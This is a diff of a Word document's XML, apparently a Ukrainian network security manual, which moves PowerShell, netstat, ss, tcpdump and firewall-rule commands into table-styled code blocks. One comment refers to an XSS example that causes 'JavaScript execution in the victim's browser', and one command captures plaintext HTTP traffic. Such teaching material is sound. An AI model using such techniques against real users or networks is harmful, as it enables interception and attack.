+              <w:t xml:space="preserve">&lt;!-- Результат: виконання JavaScript у браузері жертви --&gt;</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
+        <w:rPr>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1562,87 +1758,136 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="120" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"># Перегляд активних TCP-з'єднань</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Get-NetTCPConnection | Where-Object State -eq 'Established' |</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    Select-Object LocalPort, RemoteAddress, RemotePort, OwningProcess |</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    Sort-Object RemoteAddress</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"># Перегляд активних UDP-з'єднань</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Get-NetUDPEndpoint | Select-Object LocalPort, OwningProcess</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"># Визначення процесу за PID</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="120" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Get-Process -Id 1234 | Select-Object Name, Path</w:t>
-      </w:r>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
+        <w:rPr>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="SourceCodeTable"/>
+        <w:tblW w:type="dxa" w:w="9637"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:left w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+        </w:tblBorders>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblCellMar>
+          <w:top w:type="dxa" w:w="113"/>
+          <w:left w:type="dxa" w:w="113"/>
+          <w:bottom w:type="dxa" w:w="113"/>
+          <w:right w:type="dxa" w:w="113"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9637"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="9637"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"># Перегляд активних TCP-з'єднань</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Get-NetTCPConnection | Where-Object State -eq 'Established' |</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    Select-Object LocalPort, RemoteAddress, RemotePort, OwningProcess |</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    Sort-Object RemoteAddress</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"># Перегляд активних UDP-з'єднань</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Get-NetUDPEndpoint | Select-Object LocalPort, OwningProcess</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"># Визначення процесу за PID</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Get-Process -Id 1234 | Select-Object Name, Path</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
+        <w:rPr>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:bookmarkEnd w:id="15"/>
     <w:bookmarkStart w:id="16" w:name="linux-bash"/>
@@ -1656,69 +1901,118 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="120" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"># Активні з'єднання</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">ss -tunapl</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"># Або через netstat</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">netstat -tunapl | grep ESTABLISHED</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"># Захоплення HTTP-трафіку</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="120" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">sudo tcpdump -i eth0 port 80 -A | head -50</w:t>
-      </w:r>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
+        <w:rPr>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="SourceCodeTable"/>
+        <w:tblW w:type="dxa" w:w="9637"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:left w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+        </w:tblBorders>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblCellMar>
+          <w:top w:type="dxa" w:w="113"/>
+          <w:left w:type="dxa" w:w="113"/>
+          <w:bottom w:type="dxa" w:w="113"/>
+          <w:right w:type="dxa" w:w="113"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9637"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="9637"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"># Активні з'єднання</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">ss -tunapl</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"># Або через netstat</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">netstat -tunapl | grep ESTABLISHED</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"># Захоплення HTTP-трафіку</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">sudo tcpdump -i eth0 port 80 -A | head -50</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
+        <w:rPr>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:bookmarkEnd w:id="16"/>
     <w:bookmarkStart w:id="17" w:name="wireshark"/>
@@ -2014,198 +2308,247 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="120" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"># Перегляд поточних правил</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Get-NetFirewallRule | Where-Object Enabled -eq True |</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    Select-Object DisplayName, Direction, Action</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"># Створення правила: блокувати вхідні на порт 23 (Telnet)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">New-NetFirewallRule -DisplayName "Block Telnet" `</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    -Direction Inbound `</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    -LocalPort 23 `</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    -Protocol TCP `</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    -Action Block</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"># Створення правила: дозволити вхідні на порт 443 (HTTPS)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">New-NetFirewallRule -DisplayName "Allow HTTPS" `</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    -Direction Inbound `</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    -LocalPort 443 `</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    -Protocol TCP `</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    -Action Allow</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"># Видалення правила</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Remove-NetFirewallRule -DisplayName "Block Telnet"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"># Перевірка статусу брандмауера</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="120" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Get-NetFirewallProfile | Select-Object Name, Enabled</w:t>
-      </w:r>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
+        <w:rPr>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="SourceCodeTable"/>
+        <w:tblW w:type="dxa" w:w="9637"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:left w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+        </w:tblBorders>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblCellMar>
+          <w:top w:type="dxa" w:w="113"/>
+          <w:left w:type="dxa" w:w="113"/>
+          <w:bottom w:type="dxa" w:w="113"/>
+          <w:right w:type="dxa" w:w="113"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9637"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="9637"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"># Перегляд поточних правил</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Get-NetFirewallRule | Where-Object Enabled -eq True |</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    Select-Object DisplayName, Direction, Action</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"># Створення правила: блокувати вхідні на порт 23 (Telnet)</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">New-NetFirewallRule -DisplayName "Block Telnet" `</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    -Direction Inbound `</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    -LocalPort 23 `</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    -Protocol TCP `</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    -Action Block</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"># Створення правила: дозволити вхідні на порт 443 (HTTPS)</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">New-NetFirewallRule -DisplayName "Allow HTTPS" `</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    -Direction Inbound `</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    -LocalPort 443 `</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    -Protocol TCP `</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    -Action Allow</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"># Видалення правила</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Remove-NetFirewallRule -DisplayName "Block Telnet"</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"># Перевірка статусу брандмауера</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Get-NetFirewallProfile | Select-Object Name, Enabled</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
+        <w:rPr>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:bookmarkEnd w:id="19"/>
     <w:bookmarkStart w:id="20" w:name="linux-iptables"/>
@@ -2219,141 +2562,190 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="120" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve"># Перегляд поточних правил</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">sudo iptables -L -n -v</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
